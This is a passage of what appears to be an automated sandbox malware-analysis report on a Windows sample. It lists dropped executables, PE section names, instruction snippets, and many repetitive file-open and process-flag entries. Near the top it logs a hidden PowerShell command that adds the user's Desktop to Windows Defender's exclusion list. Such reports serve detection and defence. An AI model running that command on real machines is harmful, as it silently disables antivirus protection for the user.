Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'"Jump to behavior
Source: UBONg7lmVR.exeStatic PE information: 0xBB347EF2 [Thu Jul 11 14:49:22 2069 UTC]
Source: C:\Reka\rapnewsa.exeCode function: 23_2_002C17E0 GlobalHandle,LoadLibraryA,GetProcAddress,23_2_002C17E0
Source: y5cm2yzz.hwt.exe.0.drStatic PE information: section name: .xdata
Source: y5cm2yzz.hwt.exe.0.drStatic PE information: section name: /4
Source: y5cm2yzz.hwt.exe.0.drStatic PE information: section name: /19
Source: y5cm2yzz.hwt.exe.0.drStatic PE information: section name: /32
Source: y5cm2yzz.hwt.exe.0.drStatic PE information: section name: /46
Source: y5cm2yzz.hwt.exe.0.drStatic PE information: section name: /65
Source: y5cm2yzz.hwt.exe.0.drStatic PE information: section name: /78
Source: y5cm2yzz.hwt.exe.0.drStatic PE information: section name: /90
Source: y5cm2yzz.hwt.exe.0.drStatic PE information: section name: .symtab
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_05B44FA0 push eax; retf 0070h0_2_05B44FAA
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_05B44F8F push eax; retf 0070h0_2_05B44F9A
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_05B44F62 push eax; retf 0070h0_2_05B44F8A
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_05BDF0B0 pushfd ; ret 0_2_05BDF0B1
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_09851E40 push es; ret 0_2_09851E3F
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_0985A317 pushad ; retf 0_2_0985A325
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_0989FDD8 pushfd ; retf 0_2_0989FDD9
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_0AD1BB40 pushfd ; retf 0_2_0AD1BB55
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_0AD14EE0 push es; ret 0_2_0AD14EF5
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_0AD14F00 push es; ret 0_2_0AD14F35
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_0AD11D08 push es; ret 0_2_0AD11D16
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_0AD106E1 pushfd ; iretd 0_2_0AD106F9
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_0AD1A7F0 pushfd ; retf 0_2_0AD1A7F9
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_0B3AAFD8 push eax; ret 0_2_0B3AB271
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_0B3AB268 pushad ; ret 0_2_0B3AB269
Source: C:\Users\user\Desktop\UBONg7lmVR.exeFile created: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeFile created: C:\Reka\rapnewsa.exeJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
